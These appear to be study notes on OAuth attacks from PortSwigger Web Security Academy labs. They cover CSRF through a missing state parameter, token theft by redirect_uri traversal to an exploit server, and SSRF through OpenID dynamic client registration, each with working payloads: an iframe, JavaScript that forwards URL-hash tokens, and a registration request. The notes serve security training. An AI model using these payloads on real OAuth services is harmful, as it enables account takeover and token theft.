OAuth

OAuth Service Based Vulnerabilities

• Some Requests like /POST authenticate are vulnerable

• State Parameter is missing on which we can use IFRAME to use Clickjacking the access by linking normal account to admin account

<iframe src="<https://YOUR-LAB-OAUTH-SERVER-ID.web-security-academy.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email>"></iframe>

• Stealing of OAuth Token

<script>
window.location = '/?'+document.location.hash.substr(1)
</script>
<script>
    if (!document.location.hash) {
        window.location = '<https://YOUR-LAB-OAUTH-SERVER.web-security-academy.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20email>'
    } else {
        window.location = '/?'+document.location.hash.substr(1)
    }
</script>

• Stealing OAuth Token By the Proxy page

• SSRF Via OPENID dynamic Client Redirection

POST /reg HTTP/1.1
Host: YOUR-LAB-OAUTH-SERVER.web-security-academy.net
Content-Type: application/json

{
    "redirect_uris" : [
        "<https://example.com>"
    ],
    "logo_uri" : "<https://BURP-COLLABORATOR-SUBDOMAIN>"
}